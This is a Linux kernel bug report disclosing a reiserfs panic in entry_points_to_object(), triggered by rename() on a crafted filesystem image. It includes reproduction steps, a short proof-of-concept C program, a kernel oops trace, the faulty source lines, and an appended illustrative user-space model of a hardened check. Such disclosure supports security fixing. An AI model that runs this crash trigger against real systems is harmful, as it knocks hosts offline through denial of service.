https://bugzilla.kernel.org/show_bug.cgi?id=200343

            Bug ID: 200343
           Summary: kernel panic in entry_points_to_object() when rename() file on a reiserfs filesystem
           Product: File System
           Version: 2.5
    Kernel Version: 4.18
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ReiserFS
          Assignee: reiserfs-devel@xxxxxxxxxxxxxxx
          Reporter: wen.xu@xxxxxxxxxx
        Regression: No

Created attachment 276997
  --> https://bugzilla.kernel.org/attachment.cgi?id=276997&action=edit
The (compressed) crafted image which causes the crash

- Reproduce

# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 154.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)

#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Rename <mount>/foo/bar/baz to <mount>/foo/baz. On the crafted image the
 * directory entry lookup inside reiserfs_rename() hits the vs-7042 panic. */
static void activity(char *mpoint)
{
	char *foo_bar_baz;
	char *foo_baz;

	if (asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint) < 0 ||
	    asprintf(&foo_baz, "%s/foo/baz", mpoint) < 0) {
		perror("asprintf");
		exit(1);
	}
	if (rename(foo_bar_baz, foo_baz) < 0)
		fprintf(stderr, "rename: %s\n", strerror(errno));
	free(foo_bar_baz);
	free(foo_baz);
}

int main(int argc, char *argv[])
{
	if (argc != 2) {
		fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
		return 1;
	}
	activity(argv[1]);
	return 0;
}

- Kernel message

[  341.337045] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  341.337109] REISERFS (device loop0): using ordered data mode
[  341.337115] reiserfs: using flush barriers
[  341.338556] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  341.340934] REISERFS (device loop0): checking transaction log (loop0)
[  342.285551] REISERFS (device loop0): Using r5 hash to sort names
[  358.439533] REISERFS panic (device loop0): vs-7042 entry_points_to_object: entry must be visible
[  358.439609] ------------[ cut here ]------------
[  358.439613] kernel BUG at fs/reiserfs/prints.c:369!
[  358.441701] invalid opcode: 0000 [#1] SMP KASAN PTI
[  358.442735] CPU: 0 PID: 1426 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  358.444005] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  358.445950] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  358.446907] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  358.450650] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286
[  358.452016] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000
[  358.453438] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f
[  358.470539] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  358.471979] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80
[  358.473398] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500
[  358.474835] FS:  00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  358.476433] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  358.477578] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0
[  358.479010] Call Trace:
[  358.479529]  ? reiserfs_debug+0x10/0x10
[  358.480313]  entry_points_to_object+0xfd/0x120
[  358.481209]  reiserfs_rename+0x924/0xfc0
[  358.482004]  ? search_by_key+0x13b5/0x19d0
[  358.482842]  ? reiserfs_create+0x3d0/0x3d0
[  358.483703]  ? __asan_loadN+0xf/0x20
[  358.484441]  ? pathrelse+0x70/0x70
[  358.485161]  ? unwind_get_return_address+0x36/0x50
[  358.486136]  ? __save_stack_trace+0x92/0x100
[  358.487017]  ? __asan_loadN+0xf/0x20
[  358.487746]  ? search_by_entry_key+0x20c/0x4b0
[  358.488643]  ? __asan_loadN+0xf/0x20
[  358.489378]  ? kasan_check_write+0x14/0x20
[  358.490237]  ? blk_mq_debugfs_unregister_sched_hctx+0x50/0x50
[  358.491429]  ? _cond_resched+0x1a/0x50
[  358.492206]  vfs_rename+0xa70/0xda0
[  358.492921]  ? vfs_rename+0xa70/0xda0
[  358.493667]  ? path_mountpoint+0x940/0x940
[  358.494498]  ? kasan_check_write+0x14/0x20
[  358.495354]  ? security_path_rename+0xcb/0x130
[  358.496257]  do_renameat2+0x7d2/0x860
[  358.497004]  ? user_path_create+0x40/0x40
[  358.497836]  ? __vma_link_rb+0x12a/0x160
[  358.498640]  ? userfaultfd_unmap_complete+0x9c/0x1d0
[  358.499655]  ? handle_mm_fault+0x24b/0x380
[  358.500496]  ? mm_fault_error+0x1f0/0x1f0
[  358.501314]  ? vm_brk+0x20/0x20
[  358.501959]  __x64_sys_rename+0x3b/0x50
[  358.502764]  do_syscall_64+0x78/0x170
[  358.503523]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  358.504556] RIP: 0033:0x7f12bcd80367
[  358.505283] Code: 75 12 48 89 df e8 a9 d7 08 00 85 c0 0f 95 c0 0f b6 c0 f7 d8 5b c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b8 52 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 01 8b 35 00 f7 d8 64 89 01 48
[  358.509030] RSP: 002b:00007ffed9c1c9f8 EFLAGS: 00000202 ORIG_RAX: 0000000000000052
[  358.510521] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f12bcd80367
[  358.511950] RDX: 00000000020f00a0 RSI: 00000000020f00a0 RDI: 00000000020f0080
[  358.513359] RBP: 00007ffed9c1ca30 R08: 00000000020f0010 R09: 0000000000000000
[  358.514779] R10: 0000000000000640 R11: 0000000000000202 R12: 0000000000400530
[  358.516190] R13: 00007ffed9c1cb30 R14: 0000000000000000 R15: 0000000000000000
[  358.517602] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  358.527284] ---[ end trace 2e85051acb5f6dc1 ]---
[  358.528655] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  358.529693] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  358.533670] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286
[  358.534837] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000
[  358.536320] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f
[  358.537750] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  358.539185] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80
[  358.540646] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500
[  358.542084] FS:  00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  358.543738] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  358.544901] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0

- Location

https://elixir.bootlin.com/linux/latest/source/fs/reiserfs/namei.c#L1278

	if (inode) {
		if (!de_visible(de->de_deh + de->de_entry_num))
			reiserfs_panic(inode->i_sb, "vs-7042",
				       "entry must be visible");
		return (de->de_objectid == inode->i_ino) ? 1 : 0;
	}

The check treats an invisible directory entry as an internal invariant violation and calls reiserfs_panic(), so a crafted on-disk image with the visibility bit cleared in an entry head turns an ordinary rename() into a kernel BUG.

Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech.
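As an added illustration that is not part of the bug report or the kernel source, the following user-space C model decodes two constructed on-disk entry heads and applies the quoted check, returning an error for an invisible entry instead of panicking; the struct layout and the DEH_Visible bit position are assumed from fs/reiserfs/reiserfs.h, and the error-return behaviour is an assumed hardening, not the mainline fix.

```c
/* Added user-space model of the check quoted above, not kernel code. Assumed
 * from fs/reiserfs/reiserfs.h: struct reiserfs_de_head is 16 packed bytes
 * (offset, dir_id, objectid as __le32; location, state as __le16) and
 * DEH_Visible is bit 2 of deh_state. Returning an error instead of panicking
 * is an assumed hardening, not the mainline fix. */
#include <stdint.h>
#include <stdio.h>

#define DEH_SIZE    16
#define DEH_Visible 2

struct de_head { uint32_t offset, dir_id, objectid; uint16_t location, state; };
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p) { return le16(p) | ((uint32_t)le16(p + 2) << 16); }

/* Decode one on-disk entry head as stored (little-endian) in the image. */
static void deh_decode(const uint8_t *raw, struct de_head *d)
{
	d->offset = le32(raw);        d->dir_id = le32(raw + 4);
	d->objectid = le32(raw + 8);  d->location = le16(raw + 12);
	d->state = le16(raw + 14);
}

static int de_visible(const struct de_head *d) { return (d->state >> DEH_Visible) & 1; }

/* 1: entry names inode ino; 0: names another inode; -1: entry not visible.
 * The kernel reaches reiserfs_panic("vs-7042") in the -1 case, which is the
 * path the crafted image drives rename() into. */
int entry_points_to_object(const uint8_t *raw, uint32_t ino)
{
	struct de_head d;
	deh_decode(raw, &d);
	if (!de_visible(&d))
		return -1;	/* corrupt entry: report it, let the caller fail with EIO */
	return d.objectid == ino;
}

/* Constructed sample heads: both name objectid 12345 (0x3039); only the first
 * has DEH_Visible set in deh_state. */
const uint8_t VISIBLE_DEH[DEH_SIZE] = { 0x00, 0x01, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
					0x39, 0x30, 0x00, 0x00, 0xf0, 0x0f, 0x04, 0x00 };
const uint8_t HIDDEN_DEH[DEH_SIZE]  = { 0x00, 0x01, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
					0x39, 0x30, 0x00, 0x00, 0xf0, 0x0f, 0x00, 0x00 };

int main(void)
{
	printf("visible: %d hidden: %d\n", entry_points_to_object(VISIBLE_DEH, 12345),
	       entry_points_to_object(HIDDEN_DEH, 12345));
	return 0;
}
```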